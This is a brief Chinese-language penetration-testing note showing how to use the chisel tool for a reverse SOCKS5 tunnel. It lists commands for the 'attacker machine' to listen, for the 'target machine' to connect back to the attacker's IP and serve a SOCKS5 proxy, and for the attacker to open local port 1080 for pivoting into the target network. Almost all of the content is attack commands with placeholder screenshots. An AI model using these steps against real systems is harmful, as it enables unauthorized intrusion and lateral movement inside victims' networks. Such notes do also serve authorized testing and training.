chisel

https://github.com/jpillora/chisel/releases
攻击机监听
>chisel.exe server -p 12138 --reverse
image
靶机执行
>chisel.exe client 192.168.0.102:12138 R:12345:127.0.0.1:12346
image
靶机执行
>chisel.exe server -p 12346 --socks5
image
攻击机执行
>chisel.exe client 127.0.0.1:12345 socks
image
当隧道建立成功时,攻击机本地会启动1080端口
image
即可使用

最后更新于

这有帮助吗?